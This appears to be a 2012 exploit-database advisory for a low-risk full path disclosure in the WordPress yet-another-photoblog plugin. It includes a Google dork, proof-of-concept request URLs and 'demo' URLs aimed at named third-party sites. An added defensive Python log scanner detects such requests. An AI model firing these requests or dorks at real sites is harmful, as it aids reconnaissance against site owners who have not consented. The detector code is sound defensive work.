WordPress yet-another-photoblog plugin Full path disclosure Vulnerability



EKU-ID: 2402 CVE: OSVDB-ID:
Author: KinG Of PiraTeS Published: 2012-07-03 Verified: Verified


================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \
                                                    
================================================================================
####
# Exploit Title: WordPress yet another photoblog plugin Full path disclosure Vulnerability
# Author: KinG Of PiraTeS
# Facebook Profile: www.fb.me/cr4ck3d
# Facebook Page : www.fb.me/serial.crack
# E-mail: t5r@hotmail.com / cr4ck3d@offdr5cax.dz
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Category:: webapps
# Google Dork: inurl:/wp-content/plugins/yet-another-photoblog/
# platform : php
# Vendor: http://wordpress.org/extend/plugins/yet-another-photoblog/
# Version: all
# Security Risk : Low ( Only for information )
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####


##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ------>  KinG Of PiraTeS * The g0bl!n <-------- * |
# | ------------------------------------------------- < |
###


#

1)Exploit
=========

[~] P0c [~] :
============

Vulnerable file (the file-upload field template):

./wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php

http://localhost/wordpress/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com

http://localhost/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com

[~] D3m0 [~] :
=============

http://wormman.org/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com
http://www.americanclublille.org/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com
http://www.54art.ch/wp-content/plugins/yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=1337day.com

.
.
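
A defender-side check for the request pattern shown above, added here as an example (it is not part of the original advisory or of the plugin's code): it scans access logs in Combined Log Format for direct requests to plugin `*.tpl.php` files and records whether the server blocked them. The log lines are constructed, and extending the check from this one template to any plugin template file is this example's own assumption.

```python
import posixpath
import re
from urllib.parse import unquote

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Template files are include()d by plugin code; a URL request for one is anomalous.
TPL_RE = re.compile(
    r'/wp-content/plugins/(?P<plugin>[^/]+)/(?:.+/)?[^/]+\.tpl\.php$', re.I
)

def direct_template_hits(lines):
    """Return one record per request that targets a plugin *.tpl.php file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        # Drop the query string, decode %xx, then collapse // and ./ so that
        # encoded or padded variants of the path are still matched.
        path = unquote(m["target"].split("?", 1)[0])
        path = posixpath.normpath(re.sub(r"/+", "/", path))
        t = TPL_RE.search(path)
        if t:
            status = int(m["status"])
            hits.append({"ip": m["ip"], "plugin": t["plugin"], "path": path,
                         "status": status, "blocked": status in (403, 404)})
    return hits

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jul/2012:10:00:01 +0000] "GET /wp-content/plugins/'
    'yet-another-photoblog/tpl/edit_form_advanced_field_fileupload.tpl.php?=x '
    'HTTP/1.1" 200 412 "-" "-"',
    '198.51.100.7 - - [03/Jul/2012:10:00:05 +0000] "GET /wordpress//wp-content/plugins/'
    'yet-another-photoblog/tpl/%65dit_form_advanced_field_fileupload.tpl.php '
    'HTTP/1.1" 403 199 "-" "-"',
    '203.0.113.4 - - [03/Jul/2012:10:01:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.4 - - [03/Jul/2012:10:01:09 +0000] "GET /2012/07/a-post/ HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for h in direct_template_hits(SAMPLE_LOG):
        state = "blocked" if h["blocked"] else "SERVED"
        print(f'{state:7} {h["status"]} {h["ip"]:15} {h["path"]}')
```

Hits that were not blocked are the ones to review; denying direct requests to the plugin's `tpl/` directory at the web server turns them into 403 responses.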

####

Peace From Algeria

####
=================================**Algerians Hackers**===============================================
# Greets To :
   KedAns-Dz & Caddy-Dz & kalashinkov3 **All Algerians Hackers** , Kondamne ,  errajol ettayeb
   (exploit-id.com) , (1337day.com) , (Sec4ever.com) , (h4ckforu.com) , (alboraaq.com)
   All My Friendz: Hanixpo , Caddy-Dz , Indoushka , Jago-dz ,saoucha , BriscO-Dz
   Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic , Tn_Scorpion , ..others ?___?
=====================================================================================================